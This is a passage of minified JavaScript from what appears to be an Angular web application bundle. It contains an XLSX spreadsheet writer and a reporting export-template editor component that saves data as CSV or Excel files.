customHeight="1"'):"")+">"+q+"</row>"}(te,pe,{getStyle:n,getSharedString:r,customFont:c,dateFormat:d,usesSchema:void 0!==e})}).join("")}(pe.data,{schema:e,headerStyle:n,getStyle:r,getSharedString:c,customFont:d,dateFormat:T})).replace("{views}",function wCt(t){var a=t.stickyRowsCount,e=t.stickyColumnsCount;if(!a&&!e)return"";var i="";return i+="<sheetViews>",i+='<sheetView tabSelected="1" workbookViewId="0">',i+='<pane ySplit="'.concat(a||0,'" xSplit="').concat(e||0,'" topLeftCell="').concat(XT(e||0,(a||0)+1),'" activePane="bottomRight" state="frozen"/>'),(i+="</sheetView>")+"</sheetViews>"}({stickyRowsCount:q,stickyColumnsCount:Y})).replace("{columnsDescription}",function CCt(t){var a=t.schema,e=t.columns;if(a||e){var i=(a||e).map(gCt).join("");if(i)return"<cols>".concat(i,"</cols>")}return""}({schema:e,columns:i})).replace("{mergedCellsDescription}",function DCt(t){return 0===t.length?"":'<mergeCells count="'.concat(t.length,'">')+t.map(function(a){var e=function MCt(t,a){return function ECt(t){if(Array.isArray(t))return t}(t)||function TCt(t,a){var e=null==t?null:"undefined"!=typeof Symbol&&t[Symbol.iterator]||t["@@iterator"];if(null!=e){var c,d,i=[],n=!0,r=!1;try{for(e=e.call(t);!(n=(c=e.next()).done)&&(i.push(c.value),!a||i.length!==a);n=!0);}catch(T){r=!0,d=T}finally{try{!n&&null!=e.return&&e.return()}finally{if(r)throw d}}return i}}(t,a)||function ACt(t,a){if(t){if("string"==typeof t)return BZ(t,a);var e=Object.prototype.toString.call(t).slice(8,-1);if("Object"===e&&t.constructor&&(e=t.constructor.name),"Map"===e||"Set"===e)return Array.from(t);if("Arguments"===e||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(e))return BZ(t,a)}}(t,a)||function vCt(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}()}(a,2),i=e[0],n=e[1],r=XT(i[1],i[0]+1)+":"+XT(n[1],n[0]+1);return'<mergeCell ref="'.concat(r,'"/>')}).join("")+"</mergeCells>"}(Fe)).replace("{layout}",function xCt(t){var a=t.sheetId,e=t.orientation,i="";return e&&(i+="<pageMargins",i+=' left="'.concat(.7,'"'),i+=' right="'.concat(.7,'"'),i+=' top="'.concat(.75,'"'),i+=' bottom="'.concat(.75,'"'),i+=' header="'.concat(.3,'"'),i+=' footer="'.concat(.3,'"'),i+="/>"),e&&(i+="<pageSetup",i+=' paperSize="'.concat(9,'"'),i+=' orientation="'.concat(bf(e),'"'),i+=' r:id="rId'.concat(a,'"'),i+="/>"),i}({sheetId:te,orientation:k}))}function YT(t,a){var e="undefined"!=typeof Symbol&&t[Symbol.iterator]||t["@@iterator"];if(e)return(e=e.call(t)).next.bind(e);if(Array.isArray(t)||(e=function kCt(t,a){if(t){if("string"==typeof t)return HZ(t,a);var e=Object.prototype.toString.call(t).slice(8,-1);if("Object"===e&&t.constructor&&(e=t.constructor.name),"Map"===e||"Set"===e)return Array.from(t);if("Arguments"===e||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(e))return HZ(t,a)}}(t))||a&&t&&"number"==typeof t.length){e&&(t=e);var i=0;return function(){return i>=t.length?{done:!0}:{done:!1,value:t[i++]}}}throw new TypeError("Invalid attempt to iterate non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function HZ(t,a){(null==a||a>t.length)&&(a=t.length);for(var e=0,i=new Array(a);e<a;e++)i[e]=t[e];return i}function N7(t){if("#"!==t[0])throw new Error('Color "'.concat(t,'" must start with a "#"'));return"FF".concat(t.slice(1).toUpperCase())}function qZ(t,a){(null==a||a>t.length)&&(a=t.length);for(var e=0,i=new Array(a);e<a;e++)i[e]=t[e];return i}function zCt(){var t=[],a={};return{getSharedStringsXml:function(){return function WCt(t){var a='<?xml version="1.0"?>';a+='<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">';for(var i,e=function NCt(t,a){var e="undefined"!=typeof Symbol&&t[Symbol.iterator]||t["@@iterator"];if(e)return(e=e.call(t)).next.bind(e);if(Array.isArray(t)||(e=function LCt(t,a){if(t){if("string"==typeof t)return qZ(t,a);var e=Object.prototype.toString.call(t).slice(8,-1);if("Object"===e&&t.constructor&&(e=t.constructor.name),"Map"===e||"Set"===e)return Array.from(t);if("Arguments"===e||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(e))return qZ(t,a)}}(t))||a&&t&&"number"==typeof t.length){e&&(t=e);var i=0;return function(){return i>=t.length?{done:!0}:{done:!1,value:t[i++]}}}throw new TypeError("Invalid attempt to iterate non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}(t);!(i=e()).done;){var n=i.value,r=n.trim().length===n.length?"":' xml:space="preserve"';a+="<si><t".concat(r,">"),a+=OZ(n),a+="</t></si>"}return a+"</sst>"}(t)},getSharedString:function(i){var n=a[i];return void 0===n&&(n=String(t.length),a[i]=n,t.push(i)),n}}}var FCt=/[\[\]\/\\:*?]+/;function VCt(t){if(!t)throw new Error("Sheet name can't be empty");if(t.length>31)throw new Error('Sheet name "'.concat(t,"\" can't be longer than 31 characters"));if(FCt.test(t))throw new Error('Sheet name "'.concat(t,'" contains illegal characters: []/\\:*?'))}function GZ(t,a){var e="undefined"!=typeof Symbol&&t[Symbol.iterator]||t["@@iterator"];if(e)return(e=e.call(t)).next.bind(e);if(Array.isArray(t)||(e=function BCt(t,a){if(t){if("string"==typeof t)return jZ(t,a);var e=Object.prototype.toString.call(t).slice(8,-1);if("Object"===e&&t.constructor&&(e=t.constructor.name),"Map"===e||"Set"===e)return Array.from(t);if("Arguments"===e||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(e))return jZ(t,a)}}(t))||a&&t&&"number"==typeof t.length){e&&(t=e);var i=0;return function(){return i>=t.length?{done:!0}:{done:!1,value:t[i++]}}}throw new TypeError("Invalid attempt to iterate non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function jZ(t,a){(null==a||a>t.length)&&(a=t.length);for(var e=0,i=new Array(a);e<a;e++)i[e]=t[e];return i}var UCt=["fileName"];function QZ(t,a){(null==a||a>t.length)&&(a=t.length);for(var e=0,i=new Array(a);e<a;e++)i[e]=t[e];return i}function jCt(t,a){if(null==t)return{};var i,n,e=function QCt(t,a){if(null==t)return{};var n,r,e={},i=Object.keys(t);for(r=0;r<i.length;r++)!(a.indexOf(n=i[r])>=0)&&(e[n]=t[n]);return e}(t,a);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(t);for(n=0;n<r.length;n++)!(a.indexOf(i=r[n])>=0)&&(!Object.prototype.propertyIsEnumerable.call(t,i)||(e[i]=t[i]))}return e}function $Z(t){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},e=a.fileName,i=jCt(a,UCt);return $Ct(t,i).then(function(n){return e?yM.saveAs(n,e):n})}function $Ct(t,a){var e=a.sheet,i=a.sheets,n=a.schema,r=a.columns,c=a.headerStyle,d=a.fontFamily,T=a.fontSize,k=a.orientation,q=a.stickyRowsCount,Y=a.stickyColumnsCount,te=a.dateFormat,pe=new O2t;pe.file("_rels/.rels",'<?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="xl/workbook.xml"/></Relationships>'),pe.file("[Content_Types].xml",'<?xml version="1.0" ?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default ContentType="application/xml" Extension="xml"/><Default ContentType="application/vnd.openxmlformats-package.relationships+xml" Extension="rels"/><Override ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml" PartName="/xl/worksheets/sheet1.xml"/><Override ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml" PartName="/xl/workbook.xml"/><Override ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.sharedStrings+xml" PartName="/xl/sharedStrings.xml"/><Override ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.styles+xml" PartName="/xl/styles.xml"/></Types>');var Re=function HCt(t){var a=t.data,e=t.sheetName,i=t.sheetNames,n=t.schema,r=t.columns,c=t.headerStyle,d=t.fontFamily,T=t.fontSize,k=t.orientation,q=t.stickyRowsCount,Y=t.stickyColumnsCount,te=t.dateFormat,pe=zCt(),Re=pe.getSharedStringsXml,Fe=pe.getSharedString,Ne=function PCt(t){var a=t.fontFamily,e=t.fontSize,i=Boolean(a||e);void 0===a&&(a="Calibri"),void 0===e&&(e=12);var n=[],r={},c=[],d={},T=[],k={},q=[],Y={},te=[],pe={};function Re(Fe,Ne){var bn,et=Fe.fontFamily,ut=Fe.fontSize,Ze=Fe.fontWeight,yt=Fe.fontStyle,It=Fe.align,St=Fe.alignVertical,Nt=Fe.wrap,oi=Fe.color,Ai=Fe.backgroundColor,vi=Fe.borderColor,xi=Fe.borderStyle,Za=Fe.leftBorderColor,wa=Fe.leftBorderStyle,en=Fe.rightBorderColor,Vo=Fe.rightBorderStyle,Di=Fe.topBorderColor,Pi=Fe.topBorderStyle,Oi=Fe.bottomBorderColor,$i=Fe.bottomBorderStyle,Na=Ne.format,yn="".concat(et||"-",":").concat(ut||"-",":").concat(Ze||"-",":").concat(yt||"-",":").concat(oi||"-"),$r=Ai||"-",to="".concat(Di||vi||"-",":").concat(Pi||xi||"-")+"/"+"".concat(en||vi||"-",":").concat(Vo||xi||"-")+"/"+"".concat(Oi||vi||"-",":").concat($i||xi||"-")+"/"+"".concat(Za||vi||"-",":").concat(wa||xi||"-"),rl="".concat(It||"-","/").concat(St||"-","/").concat(Na||"-","/").concat(Nt||"-","/").concat(yn,"/").concat($r,"/").concat(to),Nl=d[rl];if(void 0!==Nl)return Nl;Na&&void 0===(bn=r[Na])&&(bn=r[Na]=String(100+n.length),n.push(Na));var Li,Fa,Kr=i?0:void 0;return(et||ut||Ze||yt||oi)&&void 0===(Kr=k[yn])&&(Kr=k[yn]=String(T.length),T.push({custom:!0,size:ut||e,family:et||a,weight:Ze,style:yt,color:oi})),Ai&&void 0===(Li=Y[$r])&&(Li=Y[$r]=String(q.length),q.push({color:Ai})),(vi||xi||Za||wa||en||Vo||Di||Pi||Oi||$i)&&void 0===(Fa=pe[to])&&(Fa=pe[to]=String(te.length),te.push({left:{style:wa||xi,color:Za||vi},right:{style:Vo||xi,color:en||vi},top:{style:Pi||xi,color:Di||vi},bottom:{style:$i||xi,color:Oi||vi}})),c.push({fontId:Kr,fillId:Li,borderId:Fa,align:It,alignVertical:St,wrap:Nt,formatId:bn}),d[rl]=String(c.length-1)}return T.push({size:e,family:a,custom:i}),k["-:-"]=0,q.push({}),Y["-"]=0,te.push({left:{},right:{},top:{},bottom:{}}),pe["-:-/-:-/-:-/-:-"]=0,q.push({gray125:!0}),Re({},{}),{getStylesXml:function(){return function OCt(t){var a=t.formats,e=t.styles,i=t.fonts,n=t.fills,r=t.borders,c='<?xml version="1.0" ?>';if(c+='<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">',a.length>0){c+='<numFmts count="'.concat(a.length,'">');for(var d=0;d<a.length;d++)c+='<numFmt numFmtId="'.concat(100+d,'" formatCode="').concat(bf(a[d]),'"/>');c+="</numFmts>"}c+='<fonts count="'.concat(i.length,'">');for(var k,T=YT(i);!(k=T()).done;){var q=k.value,te=q.family,pe=q.color,Re=q.weight,Fe=q.style,Ne=q.custom;c+="<font>",c+='<sz val="'.concat(q.size,'"/>'),c+="<color ".concat(pe?'rgb="'+bf(N7(pe))+'"':'theme="1"',"/>"),c+='<name val="'.concat(bf(te),'"/>'),c+='<family val="2"/>',Ne||(c+='<scheme val="minor"/>'),"bold"===Re&&(c+="<b/>"),"italic"===Fe&&(c+="<i/>"),c+="</font>"}c+="</fonts>",c+='<fills count="'.concat(n.length,'">');for(var ut,et=YT(n);!(ut=et()).done;){var Ze=ut.value,yt=Ze.color,It=Ze.gray125;c+="<fill>",yt?(c+='<patternFill patternType="solid">',c+='<fgColor rgb="'.concat(bf(N7(yt)),'"/>'),c+='<bgColor indexed="64"/>',c+="</patternFill>"):c+=It?'<patternFill patternType="gray125"/>':'<patternFill patternType="none"/>',c+="</fill>"}c+="</fills>",c+='<borders count="'.concat(r.length,'">');for(var Nt,St=YT(r);!(Nt=St()).done;){var oi=Nt.value,vi=oi.right,xi=oi.top,Za=oi.bottom,wa=function(rl,Nl){var bn=Nl.style,Kr=Nl.color;Kr&&!bn&&(bn="thin");var Li=!!Kr;return"<".concat(rl)+(bn?' style="'.concat(bf(bn),'"'):"")+(Li?">":"/>")+(Kr?'<color rgb="'.concat(bf(N7(Kr)),'"/>'):"")+(Li?"</".concat(rl,">"):"")};c+="<border>",c+=wa("left",oi.left),c+=wa("right",vi),c+=wa("top",xi),c+=wa("bottom",Za),c+="<diagonal/>",c+="</border>"}c+="</borders>",c+='<cellXfs count="'.concat(e.length,'">');for(var Vo,en=YT(e);!(Vo=en()).done;){var Di=Vo.value,Pi=Di.fontId,Oi=Di.fillId,$i=Di.borderId,Na=Di.align,jn=Di.alignVertical,yn=Di.wrap,$r=Di.formatId;c+="<xf "+[void 0!==$r?'numFmtId="'.concat($r,'"'):void 0,void 0!==$r?'applyNumberFormat="1"':void 0,void 0!==Pi?'fontId="'.concat(Pi,'"'):void 0,void 0!==Pi?'applyFont="1"':void 0,void 0!==Oi?'fillId="'.concat(Oi,'"'):void 0,void 0!==Oi?'applyFill="1"':void 0,void 0!==$i?'borderId="'.concat($i,'"'):void 0,void 0!==$i?'applyBorder="1"':void 0,Na||jn||yn?'applyAlignment="1"':void 0].filter(function(to){return to}).join(" ")+">"+(Na||jn||yn?"<alignment"+(Na?' horizontal="'.concat(bf(Na),'"'):"")+(jn?' vertical="'.concat(bf(jn),'"'):"")+(yn?' wrapText="1"':"")+"/>":"")+"</xf>"}return(c+="</cellXfs>")+"</styleSheet>"}({formats:n,styles:c,fonts:T,fills:q,borders:te})},getStyle:Re}}({fontFamily:d,fontSize:T}),et=Ne.getStylesXml,ut=Ne.getStyle;if(i&&r&&!Array.isArray(r[0]))throw new Error('In a "write multiple sheets" scenario, `columns` parameter must be an array of `columns` for each sheet.');i||(i=[e||"Sheet1"],a=[a],r&&(r=[r]),n&&(n=[n]));for(var yt,Ze=GZ(i);!(yt=Ze()).done;)VCt(yt.value);for(var St=[],Nt=0,oi=GZ(i);!oi().done;)St.push(RCt(a[Nt],{schema:n&&n[Nt],columns:r&&r[Nt],headerStyle:c,getStyle:ut,getSharedString:Fe,customFont:d||T,dateFormat:te,orientation:k,stickyRowsCount:q,stickyColumnsCount:Y,sheetId:Nt+1})),Nt++;return{sheets:i.map(function(xi,Za){return{id:Za+1,name:xi,data:St[Za]}}),getSharedStringsXml:Re,getStylesXml:et}}({data:t,sheetName:e,sheetNames:i,schema:n,columns:r,headerStyle:c,fontFamily:d,fontSize:T,orientation:k,stickyRowsCount:q,stickyColumnsCount:Y,dateFormat:te}),Fe=Re.sheets,Ne=Re.getSharedStringsXml,et=Re.getStylesXml,ut=pe.folder("xl");ut.file("_rels/workbook.xml.rels",function L2t(t){var a=t.sheets;return'<?xml version="1.0" ?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'+a.map(function(e){var i=e.id;return'<Relationship Id="rId'.concat(i,'" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet').concat(i,'.xml"/>')}).join("")+'<Relationship Id="rId'.concat(a.length+1,'" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/sharedStrings" Target="sharedStrings.xml"/>')+'<Relationship Id="rId'.concat(a.length+2,'" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>')+"</Relationships>"}({sheets:Fe})),ut.file("workbook.xml",function N2t(t){return'<?xml version="1.0" encoding="UTF-8" standalone="yes"?><workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mx="http://schemas.microsoft.com/office/mac/excel/2008/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main"><workbookPr/>'+(t.stickyRowsCount||t.stickyColumnsCount?"<bookViews><workbookView/></bookViews>":"")+"<sheets>"+t.sheets.map(function(n){var r=n.id;return'<sheet name="'.concat(n.name,'" sheetId="').concat(r,'" r:id="rId').concat(r,'"/>')}).join("")+"</sheets><definedNames/><calcPr/></workbook>"}({sheets:Fe,stickyRowsCount:q,stickyColumnsCount:Y})),ut.file("styles.xml",et()),ut.file("sharedStrings.xml",Ne());for(var yt,Ze=function qCt(t,a){var e="undefined"!=typeof Symbol&&t[Symbol.iterator]||t["@@iterator"];if(e)return(e=e.call(t)).next.bind(e);if(Array.isArray(t)||(e=function GCt(t,a){if(t){if("string"==typeof t)return QZ(t,a);var e=Object.prototype.toString.call(t).slice(8,-1);if("Object"===e&&t.constructor&&(e=t.constructor.name),"Map"===e||"Set"===e)return Array.from(t);if("Arguments"===e||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(e))return QZ(t,a)}}(t))||a&&t&&"number"==typeof t.length){e&&(t=e);var i=0;return function(){return i>=t.length?{done:!0}:{done:!1,value:t[i++]}}}throw new TypeError("Invalid attempt to iterate non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}(Fe);!(yt=Ze()).done;){var It=yt.value,Nt=It.data;ut.file("worksheets/sheet".concat(It.id,".xml"),Nt)}return pe.generateAsync({type:"blob",mimeType:"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet"})}function XCt(t,a){if(1&t&&(m(0,"mat-option",14),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetExportTypeName(e)))}}function YCt(t,a){if(1&t&&(m(0,"mat-option",14),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(3);V("value",e),C(1),ke(re(2,2,i.GetExportFilterName(e)))}}function JCt(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",15),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"mat-select",4),he("valueChange",function(n){return be(e),Me(B(2).template.ExportFilter=n)}),oe(7,"translate"),s(8,"\n      "),ne(9,YCt,3,4,"mat-option",5),s(10,"\n    "),u(),s(11,"\n  "),u()}if(2&t){const e=B(2);C(3),ke(re(4,4,"pages.reporting.exporttemplate.ExportFilter")),C(3),at("matTooltip",re(7,6,e.GetExportFilterName(e.template.ExportFilter))),V("value",e.template.ExportFilter),C(3),V("ngForOf",e.GetExportFilterValues())}}function ZCt(t,a){if(1&t){const e=Ye();m(0,"th"),s(1),oe(2,"translate"),m(3,"button",16),he("click",function(){const r=be(e).index;return Me(B(2).AddColumn(r))}),oe(4,"translate"),m(5,"mat-icon"),s(6,"add"),u()(),s(7,"\n        "),m(8,"button",16),he("click",function(){const r=be(e).$implicit;return Me(B(2).DeleteColumn(r))}),oe(9,"translate"),m(10,"mat-icon"),s(11,"delete"),u()(),s(12,"\n      "),u()}if(2&t){const e=a.index;ri("border-color",B(2).theme.IsDarkMode?"#424242":"#F5F5F5"),C(1),za("\n        ",re(2,6,"pages.reporting.exporttemplate.Column")," ",e," \n        "),C(2),at("matTooltip",re(4,8,"general.Add")),C(5),at("matTooltip",re(9,10,"general.Delete"))}}function eyt(t,a){if(1&t){const e=Ye();m(0,"td")(1,"input",17),he("ngModelChange",function(n){return Me(be(e).$implicit.name=n)}),u()()}if(2&t){const e=a.$implicit;ri("border-color",B(2).theme.IsDarkMode?"#424242":"#F5F5F5"),C(1),V("ngModel",e.name)}}function tyt(t,a){if(1&t&&(m(0,"option",14),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B().$implicit,n=B(3);V("value",i+"."+e),C(1),ke(re(2,2,n.GetExportPropertyName(e)))}}function iyt(t,a){if(1&t&&(m(0,"optgroup",21),oe(1,"translate"),s(2,"\n            "),ne(3,tyt,3,4,"option",5),s(4,"\n          "),u()),2&t){const e=a.$implicit,i=B(3);at("label",re(1,2,i.GetExportClassName(e))),C(3),V("ngForOf",i.GetExportProperties(e))}}function ayt(t,a){if(1&t){const e=Ye();m(0,"td"),s(1,"\n        "),m(2,"select",18),he("ngModelChange",function(n){return Me(be(e).$implicit.value=n)})("change",function(n){const c=be(e).index;return Me(B(2).OnCellChanged(n,c))}),s(3,"\n          "),m(4,"option",19),s(5),oe(6,"translate"),u(),s(7,"\n          "),ne(8,iyt,5,4,"optgroup",20),s(9,"\n        "),u(),s(10,"\n      "),u()}if(2&t){const e=a.$implicit,i=B(2);ri("border-color",i.theme.IsDarkMode?"#424242":"#F5F5F5"),C(2),V("ngModel",e.value),C(3),ke(re(6,5,"properties.selectNone")),C(3),V("ngForOf",i.GetAvailableClasses())}}function nyt(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",22),s(1,"\n      "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n      "),m(6,"input",23),he("keyup",function(n){return be(e),Me(B(2).ApplyFilter(n))}),u(),s(7,"\n    "),u()}2&t&&(C(3),ke(re(4,1,"pages.reporting.exporttemplate.filter")))}function oyt(t,a){if(1&t&&(m(0,"th",31),s(1),u()),2&t){const e=B().$implicit;C(1),ct("\n            ",e.name,"\n          ")}}function ryt(t,a){if(1&t&&(m(0,"td",32),s(1),u()),2&t){const e=a.$implicit,i=B().index;C(1),ct("\n            ",e[i],"\n          ")}}function syt(t,a){if(1&t&&(bt(0,28),s(1,"\n          "),ne(2,oyt,2,1,"th",29),s(3,"\n          "),ne(4,ryt,2,1,"td",30),s(5,"\n        "),Mt()),2&t){const e=a.index;V("matColumnDef",B(3).ToString(e))}}function cyt(t,a){1&t&&it(0,"tr",33)}function lyt(t,a){1&t&&it(0,"tr",34)}function dyt(t,a){if(1&t&&(m(0,"table",24),s(1,"\n        "),ne(2,syt,6,1,"ng-container",25),s(3,"\n      \n        "),ne(4,cyt,1,0,"tr",26),s(5,"\n        "),ne(6,lyt,1,0,"tr",27),s(7,"\n      "),u()),2&t){const e=B(2);V("dataSource",e.dataRows),C(2),V("ngForOf",e.displayedTemplate),C(2),V("matHeaderRowDef",e.displayedColumns)("matHeaderRowDefSticky",!0),C(2),V("matRowDefColumns",e.displayedColumns)}}function myt(t,a){if(1&t){const e=Ye();m(0,"div",1),s(1,"\n  "),m(2,"mat-form-field",2),s(3,"\n    "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n    "),m(8,"input",3),he("ngModelChange",function(n){return be(e),Me(B().template.Name=n)}),u(),s(9,"\n  "),u(),s(10,"\n  "),it(11,"br"),s(12,"\n  "),m(13,"mat-form-field",2),s(14,"\n    "),m(15,"mat-label"),s(16),oe(17,"translate"),u(),s(18,"\n    "),m(19,"mat-select",4),he("valueChange",function(n){return be(e),Me(B().template.ExportType=n)}),oe(20,"translate"),s(21,"\n      "),ne(22,XCt,3,4,"mat-option",5),s(23,"\n    "),u(),s(24,"\n  "),u(),s(25,"\n  "),ne(26,JCt,12,8,"mat-form-field",6),s(27,"\n  "),it(28,"br"),s(29,"\n  "),m(30,"table"),s(31,"\n    "),m(32,"tr"),s(33,"\n      "),it(34,"th"),s(35,"\n      "),ne(36,ZCt,13,12,"th",7),s(37,"\n    "),u(),s(38,"\n    "),m(39,"tr"),s(40,"\n      "),m(41,"td"),s(42),oe(43,"translate"),u(),s(44,"\n      "),ne(45,eyt,2,3,"td",7),s(46,"\n    "),u(),s(47,"\n    "),m(48,"tr"),s(49,"\n      "),m(50,"td"),s(51),oe(52,"translate"),u(),s(53,"\n      "),ne(54,ayt,11,7,"td",7),s(55,"\n    "),u(),s(56,"\n  "),u(),s(57,"\n\n  "),m(58,"div",8),s(59,"\n    "),m(60,"button",9),he("click",function(){return be(e),Me(B().GeneratePreview())}),s(61),oe(62,"translate"),u(),s(63,"\n    "),m(64,"button",10),he("click",function(){return be(e),Me(B().SaveCSV())}),s(65),oe(66,"translate"),u(),s(67,"\n    "),m(68,"button",10),he("click",function(){return be(e),Me(B().SaveExcel())}),s(69),oe(70,"translate"),u(),s(71,"\n    "),it(72,"br"),s(73,"\n    "),ne(74,nyt,8,3,"mat-form-field",11),s(75,"\n    "),it(76,"br"),s(77,"\n    "),m(78,"div",12),s(79,"\n      "),ne(80,dyt,8,5,"table",13),s(81,"\n    "),u(),s(82,"\n  "),u(),s(83,"\n"),u()}if(2&t){const e=B();Ct("disable",!e.canEdit),C(5),ke(re(6,36,"properties.Name")),C(3),at("matTooltip",e.template.Name),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.template.Name),C(8),ke(re(17,38,"pages.reporting.exporttemplate.ExportType")),C(3),at("matTooltip",re(20,40,e.GetExportTypeName(e.template.ExportType))),V("value",e.template.ExportType),C(3),V("ngForOf",e.GetExportTypeValues()),C(4),V("ngIf",e.template.HasExportFilter),C(4),ri("border-color",e.theme.IsDarkMode?"#424242":"#F5F5F5"),C(2),ri("border-color",e.theme.IsDarkMode?"#424242":"#F5F5F5"),C(2),ri("border-color",e.theme.IsDarkMode?"#424242":"#F5F5F5"),C(2),V("ngForOf",e.template.Template),C(3),ri("border-color",e.theme.IsDarkMode?"#424242":"#F5F5F5"),C(2),ri("border-color",e.theme.IsDarkMode?"#424242":"#F5F5F5"),C(1),ke(re(43,42,"pages.reporting.exporttemplate.Header")),C(3),V("ngForOf",e.template.Template),C(5),ri("border-color",e.theme.IsDarkMode?"#424242":"#F5F5F5"),C(1),ke(re(52,44,"pages.reporting.exporttemplate.Rows")),C(3),V("ngForOf",e.template.Template),C(6),V("disabled",!e.canGenerate),C(1),ke(re(62,46,"pages.reporting.exporttemplate.Preview")),C(3),V("disabled",!e.canDownload),C(1),ke(re(66,48,"pages.reporting.exporttemplate.DownloadCSV")),C(3),V("disabled",!e.canDownload),C(1),ke(re(70,50,"pages.reporting.exporttemplate.DownloadExcel")),C(5),V("ngIf",e.dataRows),C(6),V("ngIf",e.dataRows)}}let uyt=(()=>{class t{constructor(e,i,n){this.theme=e,this.dataService=i,this.translate=n,this.canEdit=!0,this.dataRows=null}get template(){return this._template}set template(e){this._template=e,e&&(!e.Template||e.Template.length<=1)&&(e.Template=[{name:"",value:null},{name:"",value:null}]),this.dataRows=null}get canGenerate(){return this.template.Template.some(e=>null!=e.value)}get canDownload(){return null!=this.dataRows}get displayedColumns(){return[...Array(this.template.Template.filter(e=>e.value).length).keys()].map(e=>e.toString())}get displayedTemplate(){return this.template.Template.filter(e=>e.value)}ngOnInit(){}GeneratePreview(){this.dataRows=new Ld(this.template.GetRowData(this.translate)),setTimeout(()=>{this.dataRows.sort=this.sort})}SaveCSV(){const e=[];e.push(this.template.Template.map(c=>c.name)),e.push(...this.dataRows.sortData(this.dataRows.filteredData,this.dataRows.sort));let i="",n=",";"de"==this.translate.currentLang&&(n=";"),e.forEach(c=>{i+=c.map(d=>'"'+d+'"').join(n)+"\n"});const r=new Blob([i]);(0,yM.saveAs)(r,this.dataService.Project.Name.replace(".ttmp",".csv"),{type:"text/plain;charset=utf-8"})}SaveExcel(){return function(t,a,e,i){return new(e||(e=Promise))(function(r,c){function d(q){try{k(i.next(q))}catch(Y){c(Y)}}function T(q){try{k(i.throw(q))}catch(Y){c(Y)}}function k(q){q.done?r(q.value):function n(r){return r instanceof e?r:new e(function(c){c(r)})}(q.value).then(d,T)}k((i=i.apply(t,a||[])).next())})}(this,void 0,void 0,function*(){const e=[],i=[];this.template.Template.map(n=>n.name).forEach(n=>i.push({value:n,fontWeight:"bold"})),e.push(i),this.dataRows.sortData(this.dataRows.filteredData,this.dataRows.sort).forEach(n=>{const r=[];n.forEach(c=>r.push({value:c})),e.push(r)}),yield $Z([e],{fileName:this.dataService.Project.Name.replace(".ttmp",".xlsx"),sheets:[this.template.Name]})})}OnCellChanged(e,i){const n=e.target.value;if(this.template.Template[i].value=""==n?null:n,this.template.Template[i].value&&(this.template.Template[i].name=this.translate.instant(this.GetExportPropertyName(this.template.Template[i].value.split(".")[1]))),i==this.template.Template.length-1&&""!=n&&this.template.Template.push({name:"",value:null}),""==n){let r=this.template.Template.length;for(;r>0&&null==this.template.Template[r-1].value;)r-=1;this.template.Template.splice(r+1)}}AddColumn(e){this.template.Template.splice(e+1,0,{name:"",value:null})}DeleteColumn(e){const i=this.template.Template.indexOf(e);i>=0&&this.template.Template.splice(i,1)}GetAvailableClasses(){return DT.GetKeys(this.template.ExportType)}GetExportClassName(e){return DT.ToString(e)}GetExportProperties(e){return DT.GetProperties(e)}GetExportPropertyName(e){return Yo.GetKeys().includes(e)?Yo.ToString(e):bT.GetKeys().includes(e)?bT.ToString(e):MT.GetKeys().includes(e)?MT.ToString(e):vT.GetKeys().includes(e)?vT.ToString(e):AT.GetKeys().includes(e)?AT.ToString(e):TT.GetKeys().includes(e)?TT.ToString(e):ET.GetKeys().includes(e)?ET.ToString(e):void 0}GetExportTypeValues(){return OG.GetKeys()}GetExportTypeName(e){return OG.ToString(e)}GetExportFilterValues(){return NG.GetKeys()}GetExportFilterName(e){return NG.ToString(e)}ApplyFilter(e){this.dataRows.filter=e.target.value.trim().toLowerCase()}ToString(e){return 